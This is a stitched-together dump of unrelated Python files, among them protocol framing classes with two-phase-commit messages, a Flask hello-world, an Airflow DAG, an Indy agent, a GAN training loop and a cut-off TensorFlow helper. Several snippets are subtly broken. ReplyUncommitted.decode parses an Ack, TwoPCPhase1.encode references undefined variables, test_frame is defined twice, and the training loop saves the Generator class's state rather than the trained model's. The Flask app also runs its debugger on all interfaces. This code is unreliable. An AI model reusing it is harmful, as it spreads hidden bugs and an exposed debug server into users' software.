assert(decoded.acks == acks) assert(decoded == ack) assert(str(decoded) == str(ack)) class Restart(object): """ Restart(address: String) """ def __init__(self, address=None): self.address = address def __str__(self): return "Restart({!r})".format(self.address) def __eq__(self, other): return (other.address == self.address) def encode(self): if self.address is not None: b_addr = self.address.encode() return struct.pack('>I{}s'.format(len(b_addr)), len(b_addr), b_addr) else: return struct.pack('>I', 0) @staticmethod 
def decode(bs): addr = None if len(bs) > 0: reader = StringIO(bs) a_length = struct.unpack('>I', reader.read(4))[0] if a_length > 0: addr = reader.read(a_length).decode() return Restart(addr) def test_restart(): addr = '127.0.0.1:5555' r = Restart(addr) encoded = r.encode() assert(len(encoded) == len(addr.encode()) + 4) decoded = Restart.decode(encoded) assert(isinstance(decoded, Restart)) assert(decoded == r) assert(str(decoded) == str(r)) class Frame(object): _FRAME_TYPE_TUPLES = [(0, Hello), (1, Ok), (2, Error), (3, Notify), (4, NotifyAck), (5, Message), (6, Ack), (7, Restart)] _FRAME_TYPE_MAP = dict([(v, t) for v, t in _FRAME_TYPE_TUPLES] + [(t, v) for v, t in _FRAME_TYPE_TUPLES]) @classmethod def encode(cls, msg): frame_tag = cls._FRAME_TYPE_MAP[type(msg)] data = msg.encode() return struct.pack('>IB', len(data)+1, frame_tag) + data @classmethod def decode(cls, bs): # bs does not include frame length header frame_tag = struct.unpack('>B', bs[0:1])[0] return cls._FRAME_TYPE_MAP[frame_tag].decode(bs[1:]) @staticmethod def read_header(bs): return struct.unpack('>I', bs[:4])[0] def _test_frame_encode_decode(msg): framed = Frame.encode(msg) decoded = Frame.decode(framed[4:]) assert(decoded == msg) def test_frame(): assert(Frame.read_header(struct.pack('>I', 50)) == 50) msgs = [] msgs.append(Hello("version", "cookie", "program_name", "instance_name")) msgs.append(Ok(100, [(1,b"",1), (2, b"2", 2)], [("s1", "1.1.1.1:1234")])) msgs.append(Error("this is an error message")) msgs.append(Notify(123, b"stream123", 1001)) msgs.append(NotifyAck(False, 123, 1001)) # Message framing is tested in the test_message test msgs.append(Ack(1000, [(123, 999), (300, 200)])) msgs.append(Restart('127.0.0.1:5555')) for msg in msgs: _test_frame_encode_decode(msg) #### #### 2PC #### class ListUncommitted(object): """ ListUncommitted(rtag: U64) """ def __init__(self, rtag): self.rtag = rtag def __str__(self): return "ListUncommitted(rtag={!r})".format(self.rtag) def __eq__(self, other): return (self.rtag == other.rtag) def encode(self): return (struct.pack('>Q', self.rtag)) @staticmethod def decode(bs): reader = StringIO(bs) rtag = struct.unpack(">Q", reader.read(8))[0] return ListUncommitted(rtag) class ReplyUncommitted(object): """ ReplyUncommitted(rtag: U64, txn_ids: Array[(txn_id: String]) """ def __init__(self, rtag, txn_ids): self.rtag = rtag self.txn_ids = txn_ids def __str__(self): return "ReplyUncommitted(rtag={!r}, txn_ids={!r})".format(self.rtag, self.txn_ids) def __eq__(self, other): return (self.rtag == other.rtag and self.txn_ids == other.txn_ids) def encode(self): return (struct.pack('>QI', self.rtag, len(self.txn_ids)) + b''.join(( struct.pack('>H{}s'.format(len(txn_id)), len(txn_id), txn_id.encode("utf-8")) for txn_id in self.txn_ids))) @staticmethod def decode(bs): reader = StringIO(bs) credits = struct.unpack(">I", reader.read(4))[0] acks_length = struct.unpack(">I", reader.read(4))[0] acks = [] for _ in range(acks_length): stream_id = struct.unpack(">Q", reader.read(8))[0] point_of_ref = struct.unpack(">Q", reader.read(8))[0] acks.append((stream_id, point_of_ref)) return Ack(credits, acks) def encode_phase2r(txn_id, commit): if commit: commit_c = b'\01' else: commit_c = b'\00' return struct.pack(">H{}sc".format(len(txn_id)), len(txn_id), txn_id, commit_c) def decode_phase2r(bs): reader = StringIO(bs) length = struct.unpack(">H", reader.read(2))[0] txn_id = reader.read(length).decode() commit_c = reader.read(1) if commit_c == b'\01': commit = True else: commit = False return (txn_id, commit) class 
TwoPCPhase1(object): """ TwoPCPhase1(txn_id: String, where_list: [(stream_id: U64, start_por: U64, end_por: U64)]) """ def __init__(self, txn_id, where_list): self.txn_id = txn_id self.where_list = where_list def __str__(self): return "TwoPCPhase1(txn_id={!r},where_list={!r})".format(self.txn_id, self.where_list) def __eq__(self, other): return (self.txn_id == other.txn_id and self.where_list == other.where_list) def encode(self): return (struct.pack(">H{}sI".format(len(txn_id)), len(txn_id), txn_id, len(where_list)) + b''.join(( struct.pack('>QQQ', stream_id, start_por, end_por) for (stream_id, start_por, end_por) in self.where_list))) @staticmethod def decode(bs): reader = StringIO(bs) length = struct.unpack(">H", reader.read(2))[0] txn_id = reader.read(length).decode() where_list = [] length = struct.unpack(">I", reader.read(4))[0] for i in range(0, length): stream_id = struct.unpack(">Q", reader.read(8))[0] start_por = struct.unpack(">Q", reader.read(8))[0] end_por = struct.unpack(">Q", reader.read(8))[0] where_list.append((stream_id, start_por, end_por)) return TwoPCPhase1(txn_id, where_list) class TwoPCReply(object): """ TwoPCReply(txn_id: String, commit: Boolean) """ def __init__(self, txn_id, commit): self.txn_id = txn_id self.commit = commit def __str__(self): return "TwoPCReply(txn_id={!r},commit={!r})".format(self.txn_id, self.commit) def __eq__(self, other): return (self.txn_id == other.txn_id and self.commit == other.commit) def encode(self): return encode_phase2r(self.txn_id, self.commit) @staticmethod def decode(bs): (txn_id, commit) = decode_phase2r(bs) return TwoPCReply(txn_id, commit) class TwoPCPhase2(object): """ TwoPCPhase2(txn_id: String, commit: Boolean) """ def __init__(self, txn_id, commit): self.txn_id = txn_id self.commit = commit def __str__(self): return "TwoPCPhase2(txn_id={!r},commit={!r})".format(self.txn_id, self.commit) def __eq__(self, other): return (self.txn_id == other.txn_id and self.commit == other.commit) def encode(self): return encode_phase2r(self.txn_id, self.commit) @staticmethod def decode(bs): (txn_id, commit) = decode_phase2r(bs) return TwoPCPhase2(txn_id, commit) class TwoPCFrame(object): _FRAME_TYPE_TUPLES = [(201, ListUncommitted) , (202, ReplyUncommitted) , (203, TwoPCPhase1), (204, TwoPCReply), (205, TwoPCPhase2) ] _FRAME_TYPE_MAP = dict([(v, t) for v, t in _FRAME_TYPE_TUPLES] + [(t, v) for v, t in _FRAME_TYPE_TUPLES]) @classmethod def encode(cls, msg): frame_tag = cls._FRAME_TYPE_MAP[type(msg)] data = msg.encode() # Don't add length for this inner message type return struct.pack('>B', frame_tag) + data @classmethod def decode(cls, bs): # bs does not include frame length header frame_tag = struct.unpack('>B', bs[0:1])[0] return cls._FRAME_TYPE_MAP[frame_tag].decode(bs[1:]) @staticmethod def read_header(bs): return struct.unpack('>I', bs[:4])[0] def _test_twopcframe_encode_decode(msg): framed = TwoPCFrame.encode(msg) decoded = TwoPCFrame.decode(framed[4:]) assert(decoded == msg) def test_frame(): assert(Frame.read_header(struct.pack('>I', 50)) == 50) msgs = [] #msgs.append(ListUncommitted(77)) #msgs.append(ReplyUncommitted(...)) #msgs.append(TwoPCPhase1(...)) #msgs.append(TwoPCReply(...)) #msgs.append(TwoPCPhase2(...)) #msgs.append(TwoPCPhase1(...)) for msg in msgs: _test_frame_encode_decode(msg) #!/usr/bin/python #-*- coding: utf-8 -*- from flask import Flask app = Flask(__name__) @app.route('/') def hello(): return 'Hello World' if __name__ == "__main__": app.run(host="0.0.0.0", debug=True) <reponame>sathish9094/docker-airflow from 
datetime import datetime from airflow import DAG from airflow.operators.dummy_operator import DummyOperator from airflow.operators.python_operator import PythonOperator def print_greetings(): return 'Hey Sathish ! Python Operator called me!' #schedule for every 5 minutes #Minutes specified as a number from 0 to 59. #Hours specified as numbers from 0 to 23. #Days of the month, specified as numbers from 1 to 31. #Months specified as numbers from 1 to 12. #Days of the week, specified as numbers from 0 to 7, with Sunday represented as either/both 0 and 7. dag = DAG('python_operator',description='simple scheduler dag',schedule_interval='*/5 * * * *', start_date=datetime(2019,12,19),catchup=False) dummy_operator = DummyOperator(task_id='dummy_task',retries=3,dag=dag) hello_operator = PythonOperator(task_id='hello_task',python_callable=print_greetings,dag=dag) dummy_operator >> hello_operator<gh_stars>0 # Configuration file for the Sphinx documentation builder. # # This file only contains a selection of the most common options. # For a full list see the documentation: # https://www.sphinx-doc.org/en/master/usage/configuration.html # -- Path setup -------------------------------------------------------------- # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. import os import sys sys.path.insert(0, os.path.abspath('../..')) # Project information project = 'Blackpink Data' copyright = '2021, <NAME>' author = '<NAME>' # The full version, including alpha/beta/rc tags release = '1.0.0' # General configuration import sphinx_rtd_theme # Add any Sphinx extension module names here, as strings. # They can be extensions coming with Sphinx ('sphinx.ext.*') # or your custom ones. extensions = [ 'sphinx.ext.autodoc', "sphinx_rtd_theme" ] # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # List of patterns, relative to the source directory, that match files and directories to ignore when looking for source files. # This pattern also affects html_static_path and html_extra_path. exclude_patterns = [] # Options for HTML output # The theme to use for HTML and HTML Help pages. See the documentation for a list of built-in themes. html_theme = "sphinx_rtd_theme" html_theme_options = { 'display_version': False, 'style_nav_header_background': '#cc5c79' } # Add any paths that contain custom static files (such as style sheets) here, relative to this directory. # They are copied after the builtin static files, so a file named "default.css" will overwrite the builtin "default.css". 
html_static_path = ['_static'] html_theme_path = ["_themes", ]import json import hassapi as hass buttons = { "living_room_balcony_door": [ "hmw_lc_bl1_dr_neq1415576" ], "guest_room_balcony_door": [ "hmw_lc_bl1_dr_neq1415822" ], "office_window": [ "hmw_lc_bl1_dr_neq1415654" ], "master_bedroom_balcony_door_bottom": [ "hmw_lc_bl1_dr_neq1415586" ], "master_bedroom_fixed_glazing_top": [ "hmw_lc_bl1_dr_neq1415382" ], "master_bedroom_fixed_glazing_bottom": [ "hmw_lc_bl1_dr_neq1415661" # brick wall ], "master_bedroom_hallway_door_bottom": [ "hmw_lc_bl1_dr_neq1415586", # balcony door "hmw_lc_bl1_dr_neq1415382", # fixed glazing "hmw_lc_bl1_dr_neq1415661", # brick wall ], } actions = { "up": "cover/open_cover", "down": "cover/close_cover", "stop": "cover/stop_cover", } class CoverManager(hass.Hass): def initialize(self): self_log = self.log self.log = lambda func, msg: self_log(f'{func}: {msg}') self.listen_event(self.button_press, 'MQTT_MESSAGE', topic='input', namespace='mqtt') self.actors = {} for button in buttons: buttons[button] = {"actors": buttons[button], "state": "off"} for actor in buttons[button]["actors"]: try: self.actors[actor].append(button) except KeyError: self.actors[actor] = [button] for actor in self.actors: self.listen_state(self.reset_state, f'cover.{actor}', attribute='working') def button_press(self, event_name, data, kwargs): button = data['payload'].rsplit("_", 2) if button[0] not in buttons: return msg = f'event_name={event_name}, data={data}, kwargs={kwargs}' self.log('button_press()', msg) action = button[1] if buttons[button[0]]["state"] == "on": state = "off" action = "stop" else: state = "on" for actor in buttons[button[0]]["actors"]: self.log('button_press()', f"{actor}: {action}") self.call_service(actions[action], entity_id=f"cover.{actor}") for button in self.actors[actor]: buttons[button]["state"] = state def reset_state(self, entity, attribute, old, new, kwargs): msg = f'entity={entity}, attribute={attribute}, old={old}, new={new}, kwargs={kwargs}' self.log('reset_state()', msg) if old == "Yes" and new == "No": for button in self.actors[entity.split(".")[1]]: self.log('reset_state()', f"{button}: off") buttons[button]["state"] = "off" """ Module defining Agent class and related methods """ import asyncio import base64 import json import struct import time import traceback from typing import Optional import aiohttp import socket from indy import wallet, did, error, crypto, pairwise import indy_sdk_utils as utils from python_agent_utils.messages.message import Message from router.family_router import FamilyRouter from serializer.json_serializer import JSONSerializer as Serializer class WalletConnectionException(Exception): pass class Agent: """ Agent class storing all needed elements for agent operation. 
""" def __init__(self, hostname=None, port=None): self.owner = None self.wallet_handle = None self.endpoint = None self.endpoint_vk = None self.ui_token = None self.pool_handle = None self.ui_socket = None self.initialized = False self.modules = {} self.family_router = FamilyRouter() self.message_queue = asyncio.Queue() self.admin_key = None self.agent_admin_key = None self.outbound_admin_message_queue = asyncio.Queue() self.offer_endpoint = None self.hostname = hostname self.port = port self.init_endpoint() def register_module(self, module): self.modules[module.FAMILY] = module(self) self.family_router.register(module.FAMILY, self.modules[module.FAMILY]) def init_endpoint(self): if not self.hostname: self.hostname = socket.gethostbyname(socket.gethostname()) self.endpoint = self.offer_endpoint = 'http://' + self.hostname self.endpoint += (':' + str(self.port) if self.port else '') + '/indy' self.offer_endpoint += (':' + str(self.port) if self.port else '') + '/offer' async def route_message_to_module(self, message): return await self.family_router.route(message) async def handle_incoming(self): try: wire_msg_bytes = await self.message_queue.get() msg = await self.unpack_wire_msg(wire_msg_bytes) if msg: return await self.route_message_to_module(msg) except Exception as e: print("\n\n--- Message Processing failed --- \n\n") traceback.print_exc() async def start(self): """ Message processing loop task. """ while True: await self.handle_incoming() async def connect_wallet(self, agent_name, passphrase, ephemeral=False): """ Create if not already exists and open wallet. """ self.owner = agent_name wallet_suffix = "wallet" if ephemeral: wallet_suffix = "ephemeral_wallet" wallet_name = '{}-{}'.format(self.owner, wallet_suffix) wallet_config = json.dumps({"id": wallet_name}) wallet_credentials = json.dumps({"key": passphrase}) # Handle ephemeral wallets if ephemeral: try: await wallet.delete_wallet(wallet_config, wallet_credentials) print("Removing ephemeral wallet.") except error.IndyError as e: if e.error_code is error.ErrorCode.WalletNotFoundError: pass # This is ok, and expected. else: print("Unexpected Indy Error: {}".format(e)) except Exception as e: print(e) # pylint: disable=bare-except try: await wallet.create_wallet(wallet_config, wallet_credentials) except error.IndyError as e: if e.error_code is error.ErrorCode.WalletAlreadyExistsError: pass # This is ok, and expected. else: print("Unexpected Indy Error: {}".format(e)) except Exception as e: print(e) try: if self.wallet_handle: await wallet.close_wallet(self.wallet_handle) self.wallet_handle = await wallet.open_wallet( wallet_config, wallet_credentials ) (_, self.endpoint_vk) = await did.create_and_store_my_did(self.wallet_handle, "{}") self.initialized = True except Exception as e: print(e) print("Could not open wallet!") raise WalletConnectionException async def disconnect_wallet(self): """ Close the wallet and set back state to non initialised. 
""" if self.wallet_handle: await wallet.close_wallet(self.wallet_handle) self.initialized = False self.owner = '' self.wallet_handle = None async def sign_agent_message_field(self, field_value, my_vk): timestamp_bytes = struct.pack(">Q", int(time.time())) sig_data_bytes = timestamp_bytes + json.dumps(field_value).encode('ascii') sig_data = base64.urlsafe_b64encode(sig_data_bytes).decode('ascii') signature_bytes = await crypto.crypto_sign( self.wallet_handle, my_vk, sig_data_bytes ) signature = base64.urlsafe_b64encode( signature_bytes ).decode('ascii') return { "@type": "did:sov:BzCbsNYhMrjHiqZDTUASHg;spec/signature/1.0/ed25519Sha512_single", "signer": my_vk, "sig_data": sig_data, "signature": signature } async def unpack_and_verify_signed_agent_message_field(self, signed_field): signature_bytes = base64.urlsafe_b64decode(signed_field['signature'].encode('ascii')) sig_data_bytes = base64.urlsafe_b64decode(signed_field['sig_data'].encode('ascii')) sig_verified = await crypto.crypto_verify( signed_field['signer'], sig_data_bytes, signature_bytes ) data_bytes = base64.urlsafe_b64decode(signed_field['sig_data']) timestamp = struct.unpack(">Q", data_bytes[:8]) fieldjson = data_bytes[8:] return json.loads(fieldjson), sig_verified async def unpack_agent_message(self, wire_msg_bytes): if isinstance(wire_msg_bytes, str): wire_msg_bytes = bytes(wire_msg_bytes, 'utf-8') unpacked = json.loads( await crypto.unpack_message( self.wallet_handle, wire_msg_bytes ) ) from_key = None from_did = None if 'sender_verkey' in unpacked: from_key = unpacked['sender_verkey'] from_did = await utils.did_for_key(self.wallet_handle, unpacked['sender_verkey']) to_key = unpacked['recipient_verkey'] to_did = await utils.did_for_key(self.wallet_handle, unpacked['recipient_verkey']) msg = Serializer.deserialize(unpacked['message']) msg.context = { 'from_did': from_did, # Could be None 'to_did': to_did, # Could be None 'from_key': from_key, # Could be None 'to_key': to_key } return msg async def send_message_to_agent(self, to_did, msg: Message): print("Sending:", msg) their_did = to_did pairwise_info = json.loads(await pairwise.get_pairwise(self.wallet_handle, their_did)) pairwise_meta = json.loads(pairwise_info['metadata']) my_did = pairwise_info['my_did'] their_endpoint = pairwise_meta['their_endpoint'] their_vk = pairwise_meta['their_vk'] my_vk = await did.key_for_local_did(self.wallet_handle, my_did) await self.send_message_to_endpoint_and_key(their_vk, their_endpoint, msg, my_vk) # used directly when sending to an endpoint without a known did async def send_message_to_endpoint_and_key(self, their_ver_key, their_endpoint, msg, my_ver_key=None): # If my_ver_key is omitted, anoncrypt is used inside pack. 
wire_message = await crypto.pack_message( self.wallet_handle, Serializer.serialize(msg).decode('utf-8'), [their_ver_key], my_ver_key ) async with aiohttp.ClientSession() as session: headers = { 'content-type': 'application/ssi-agent-wire' } async with session.post(their_endpoint, data=wire_message, headers=headers) as resp: if resp.status != 202: print(resp.status) print(await resp.text()) async def setup_admin(self, admin_key): self.admin_key = admin_key self.agent_admin_key = await crypto.create_key(self.wallet_handle, '{}') print("Admin key: ", self.agent_admin_key) async def send_admin_message(self, msg: Message): if self.agent_admin_key and self.admin_key: msg = await crypto.pack_message( self.wallet_handle, Serializer.serialize(msg).decode('utf-8'), [self.admin_key], self.agent_admin_key ) msg = msg.decode('ascii') else: msg = msg.as_json() await self.outbound_admin_message_queue.put(msg) async def unpack_wire_msg(self, wire_msg) -> Optional: # Try to unpack message assuming it's not encrypted msg = "" try: msg = Serializer.deserialize(wire_msg) except Exception as e: print("Message encrypted, attempting to unpack...") # TODO: More graceful checking here # (This is an artifact of the provisional wire format and connection protocol) if not isinstance(msg, Message) or "@type" not in msg: # Message IS encrypted so unpack it try: msg = await self.unpack_agent_message(wire_msg) except Exception as e: print('Failed to unpack message: {}\n\nError: {}'.format(wire_msg, e)) traceback.print_exc() return None return msg from copy import copy #sbaas from .stage01_rnasequencing_genesFpkmTracking_io import stage01_rnasequencing_genesFpkmTracking_io #sbaas models from .stage01_rnasequencing_genesFpkmTracking_postgresql_models import * class stage01_rnasequencing_genesFpkmTracking_execute(stage01_rnasequencing_genesFpkmTracking_io): pass;<filename>Lab_02/gcd_fsm_sim.py # # Copyright (C) 2019 <NAME> <<EMAIL>> # # This file is part of Advance SoC Design Lab Soultion. 
# # SoC Design Lab Soultion can not be copied and/or distributed without the express # permission of <NAME> # # File: gcd_fsm_sim.py # This is a pymtl simulation file for gcd calculation # from pymtl3 import * from pymtl3.passes.backends.yosys import TranslationImportPass from pymtl3.passes import TracingConfigs from gcd_fsm import * model = Gcd_fsm(b8) model.elaborate() vcd_file_name = model.__class__.__name__ model.config_tracing = TracingConfigs( tracing='vcd', vcd_file_name=vcd_file_name ) model.apply(SimulationPass()) model.en = b1(0) model.a = Bits(8, 49) model.b = Bits(8, 7) model.sim_reset() model.en = b1(1) while model.ack == b1(0): model.tick() print("cState: {} ack:{} en:{}" .format(model.cState, model.ack, model.en)) model.en = b1(0) print("in[0]: {} in[1]: {} out: {} ".format(model.a, model.b, model.out )) print("\r\nTranslate design into systemVerilog...\r\n") ModeltoTranslate = Gcd_fsm(b8) ModeltoTranslate.elaborate() ModeltoTranslate.yosys_translate_import = True ModeltoTranslate = TranslationImportPass()( ModeltoTranslate ) ModeltoTranslate.elaborate()#!/usr/bin/env python # -*- coding: utf-8 -*- """Tests for `merge_fastq` package.""" import os import pytest import subprocess from click.testing import CliRunner from merge_fastq import merge_fastq from merge_fastq import cli def test_command_line_interface(): """Test the CLI.""" runner = CliRunner() #result = runner.invoke(cli.main) #assert result.exit_code == 0 #assert 'merge_fastq.cli.main' in result.output help_result = runner.invoke(cli.main, ['--help']) assert help_result.exit_code == 0 def test_multi_fastq(): cmd = [ "merge_fastq", "--fastq1", "data/test/test_R1_001.fastq.gz", "--fastq1", "data/test/test_R1_002.fastq.gz", "--fastq1", "data/test/test_R1_003.fastq.gz", "--fastq2", "data/test/test_R2_001.fastq.gz", "--fastq2", "data/test/test_R2_002.fastq.gz", "--fastq2", "data/test/test_R2_003.fastq.gz", "--out-fastq1", "test_R1_merged.fastq.gz", "--out-fastq2", "test_R2_merged.fastq.gz" ] ret_code = run_cmd(cmd) assert ret_code == 0 assert os.path.isfile("test_R1_merged.fastq.gz") is True assert os.path.isfile("test_R2_merged.fastq.gz") is True def test_single_fastq(): cmd = [ "merge_fastq", "--fastq1", "data/test/test_R1_001.fastq.gz", "--fastq2", "data/test/test_R2_001.fastq.gz", ] ret_code = run_cmd(cmd) assert ret_code == 0 assert os.path.isfile("merged_fastq_R1.fastq.gz") is True assert os.path.isfile("merged_fastq_R2.fastq.gz") is True def run_cmd(cmd): print("Command:", cmd) process = subprocess.Popen( cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE) output, errors = process.communicate() ret_code = process.wait() return ret_code <filename>utils.py def convert_wind_to_events(event_series, top_C, start_C): flag = False event_start = [] for i in range(len(event_series)): if not flag: if event_series[i] > top_C: event_start.append(i) flag = True else: if event_series[i] < top_C: flag = False event_top = [] for i in range(len(event_start)): while (event_start[i]-1 >= 0) and (event_series[event_start[i]-1] < event_series[event_start[i]]) and (event_series[event_start[i]] > start_C): event_start[i] = event_start[i]-1 event_top = event_start[:] for i in range(len(event_top)): while (event_top[i]+1 < len(event_series)) and (event_series[event_top[i]+1] > event_series[event_top[i]]): event_top[i] = event_top[i]+1 return event_start, event_top def get_random_name(): import random return "d" + str(random.randint(1, 10000)) import os import time import torch import datetime import torch.nn.functional as F import 
torch.autograd as autograd import numpy as np from torch.autograd import Variable from config import parse_args from utils import save_sample from model import Generator, Discriminator, weights_init_normal from dataloader import celeba_loader def criterion_cls(logit, target): return F.binary_cross_entropy_with_logits(logit, target, size_average=False) / logit.size(0) def compute_gradient_penalty(D, real_samples, fake_samples, FloatTensor): alpha = FloatTensor(np.random.random((real_samples.size(0), 1, 1, 1))) interpolates = (alpha * real_samples + ((1 - alpha) * fake_samples)).requires_grad_(True) d_interpolates, _ = D(interpolates) fake = Variable(FloatTensor(np.ones(d_interpolates.shape)), requires_grad=False) gradients = autograd.grad(outputs=d_interpolates, inputs=interpolates, grad_outputs=fake, create_graph=True, retain_graph=True, only_inputs=True)[0] gradients = gradients.view(gradients.size(0), -1) gradient_penalty = ((gradients.norm(2, dim=1) - 1) ** 2).mean() return gradient_penalty def train(): opt = parse_args() os.makedirs("images/%s" % (opt.dataset), exist_ok=True) os.makedirs("checkpoints/%s" % (opt.dataset), exist_ok=True) cuda = True if torch.cuda.is_available() else False FloatTensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor # get dataloader train_loader = celeba_loader(opt, mode='train') val_loader = celeba_loader(opt, mode='val') # Dimensionality c_dim = len(opt.selected_attrs) # Initialize generator and discriminator generator = Generator(opt.channels, opt.residual_blocks, c_dim) discriminator = Discriminator(opt.channels, opt.img_height, c_dim) # Initialize weights generator.apply(weights_init_normal) discriminator.apply(weights_init_normal) # Loss function cycle_loss = torch.nn.L1Loss() if cuda: generator = generator.cuda() discriminator = discriminator.cuda() cycle_loss.cuda() # Optimizers optimizer_G = torch.optim.Adam(generator.parameters(), lr=opt.lr, betas=(opt.b1, opt.b2)) optimizer_D = torch.optim.Adam(discriminator.parameters(), lr=opt.lr, betas=(opt.b1, opt.b2)) # ------------ # Training # ------------ prev_time = time.time() for epoch in range(opt.epochs): for i, (imgs, labels) in enumerate(train_loader): # Model inputs imgs = Variable(imgs.type(FloatTensor)) labels = Variable(labels.type(FloatTensor)) # Sample label as generator inputs and Generate fake batch of images sampled_c = Variable(FloatTensor(np.random.randint(0, 2, (imgs.size(0), c_dim)))) fake_imgs = generator(imgs, sampled_c) # ---------------------- # Train Discriminator # ---------------------- optimizer_D.zero_grad() real_validity, pred_cls = discriminator(imgs) fake_validity, _ = discriminator(fake_imgs.detach()) gradient_penalty = compute_gradient_penalty(discriminator, imgs.data, fake_imgs.data, FloatTensor) d_adv_loss = -torch.mean(real_validity) + torch.mean(fake_validity) + opt.lambda_gp * gradient_penalty d_cls_loss = criterion_cls(pred_cls, labels) D_loss = d_adv_loss + opt.lambda_cls * d_cls_loss D_loss.backward() optimizer_D.step() # ----------------------------- # Train Generators # ----------------------------- optimizer_G.zero_grad() if i % opt.n_critic == 0: gen_imgs = generator(imgs, sampled_c) recov_imgs = generator(gen_imgs, labels) fake_validity, pred_cls = discriminator(gen_imgs) g_adv_loss = -torch.mean(fake_validity) g_cls_loss = criterion_cls(pred_cls, sampled_c) g_rec_loss = cycle_loss(recov_imgs, imgs) G_loss = g_adv_loss + opt.lambda_cls * g_cls_loss + opt.lambda_rec * g_rec_loss G_loss.backward() optimizer_G.step() # ------------------ # Log 
Information # ------------------ batches_done = epoch * len(train_loader) + i batches_left = opt.epochs * len(train_loader) - batches_done time_left = datetime.timedelta(seconds=batches_left * (time.time() - prev_time)) prev_time = time.time() print("[Epoch %d/%d] [Batch %d/%d] [D loss: %f, aux: %f] [G loss: %f, aux: %f, cycle: %f] ETA: %s" % (epoch, opt.epochs, i, len(train_loader), D_loss.item(), d_cls_loss.item(), G_loss.item(), g_cls_loss.item(), g_rec_loss, time_left)) if batches_done % opt.sample_interval == 0: save_sample(opt.dataset, val_loader, batches_done, generator, FloatTensor) if batches_done % opt.checkpoint_interval == 0: torch.save(Generator.state_dict(), "checkpoints/%s/G_%d.pth" % (opt.dataset, epoch)) torch.save(Generator.state_dict(), "checkpoints/%s/shared_E_done.pth" % opt.dataset) print("Training Process has been Done!") if __name__ == '__main__': train() <reponame>tellg/arxcode # -*- coding: utf-8 -*- # Generated by Django 1.11.15 on 2018-12-07 12:02 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('dominion', '0036_plotaction_working'), ] operations = [ migrations.AlterField( model_name='plotaction', name='plot', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='actions', to='dominion.Plot'), ), ] <filename>common/image_helper.py<gh_stars>100-1000 import tensorflow as tf # Below method is borrowed from tensorflow official repository # https://github.com/tensorflow/tensorflow/blob/a0b8cee815100b805a24fedfa12b28139d24e7fe/tensorflow/python/ops/image_ops_impl.py def _verify_compatible_image_shapes(img1, img2): """Checks if two image tensors are compatible for applying SSIM or PSNR. This function checks if two sets of images have ranks at least 3, and if the last three dimensions match. Args: img1: Tensor containing the first image batch. img2: Tensor containing the second image batch. Returns: A tuple containing: the first tensor shape, the second tensor shape, and a list of control_flow_ops.Assert() ops implementing the checks. Raises: ValueError: When static shape check fails. """ shape1 = img1.get_shape().with_rank_at_least(3) shape2 = img2.get_shape().with_rank_at_least(3) shape1[-3:].assert_is_compatible_with(shape2[-3:]) if shape1.ndims is not None and shape2.ndims is not None: for dim1, dim2 in zip(reversed(shape1[:-3]), reversed(shape2[:-3])): if not (dim1 == 1 or dim2 == 1 or dim1.is_compatible_with(dim2)): raise ValueError( "Two images are not compatible: %s and %s" % (shape1, shape2)) # Now assign shape tensors. shape1, shape2 = tf.shape_n([img1, img2]) checks = [] checks.append(tf.Assert( tf.greater_equal(tf.size(shape1), 3), [shape1, shape2], summarize=10)) checks.append(tf.Assert( tf.reduce_all(tf.equal(shape1[-3:], shape2[-3:])), [shape1, shape2], summarize=10)) return shape1, shape2, checks def sobel_gradient(img): """Get image and calculate the result of sobel filter. Args: imgs: Image Tensor. Either 3-D or 4-D. Return: A Tensor which concat the result of sobel in both horizontally and vertically. Therefore, number of the channels is doubled. 
""" num_channels = img.get_shape().as_list()[-1] # load filter which can be reused with tf.variable_scope("misc/img_gradient", reuse=tf.AUTO_REUSE): filter_x = tf.constant([[-1/8, 0, 1/8], [-2/8, 0, 2/8], [-1/8, 0, 1/8]], name="sobel_x", dtype=tf.float32, shape=[3, 3, 1, 1]) filter_x = tf.tile(filter_x, [1, 1, num_channels, 1]) filter_y = tf.constant([[-1/8, -2/8, -1/8], [0, 0, 0], [1/8, 2/8, 1/8]], name="sobel_y", dtype=tf.float32, shape=[3, 3, 1, 1]) filter_y = tf.tile(filter_y, [1, 1, num_channels, 1]) # calculate grad_x = tf.nn.depthwise_conv2d(img, filter_x, strides=[1, 1, 1, 1], padding="VALID", name="grad_x") grad_y = tf.nn.depthwise_conv2d(img, filter_y, strides=[1, 1, 1, 1], padding="VALID", name="grad_y") grad_xy = tf.concat([grad_x, grad_y], axis=-1) return grad_xy def _first_deriviate_gaussian_filters(size, sigma): size = tf.convert_to_tensor(size, tf.int32) sigma = tf.convert_to_tensor(sigma, tf.float32) sigma2 = tf.square(sigma) coords = tf.cast(tf.range(size), sigma.dtype) coords -= tf.cast(size - 1, sigma.dtype) / 2.0 g = tf.square(coords) g *= -0.5 / tf.square(sigma) g = tf.reshape(g, shape=[1, -1]) + tf.reshape(g, shape=[-1, 1]) g = tf.reshape(g, shape=[1, -1]) # For tf.nn.softmax(). g = tf.nn.softmax(g) g = tf.reshape(g, shape=[size, size]) # https://cedar.buffalo.edu/~srihari/CSE555/Normal2.pdf # https://github.com/scipy/scipy/blob/v0.14.0/scipy/ndimage/filters.py#L179 gx = -1 * tf.reshape(coords, shape=[1, -1]) * g / sigma2 gy = -1 * tf.reshape(coords, shape=[-1, 1]) * g / sigma2 # gx = tf.reshape(gx, shape=[1, -1]) # For tf.nn.softmax(). # gy = tf.reshape(gy, shape=[1, -1]) # For tf.nn.softmax(). # gx = tf.nn.softmax(gx) # gy = tf.nn.softmax(gy) return tf.reshape(gx, shape=[size, size, 1, 1]), tf.reshape(gy, shape=[size, size, 1, 1]) def first_deriviate_gaussian_gradient(img, sigma): """Get image and calculate the result of first deriviate gaussian filter. Now, implementation assume that channel is 1. https://www.juew.org/publication/CVPR09_evaluation_final_HQ.pdf Args: imgs: Image Tensor. Either 3-D or 4-D. Return: A Tensor which concat the result of sobel in both horizontally and vertically. Therefore, number of the channels is doubled. 
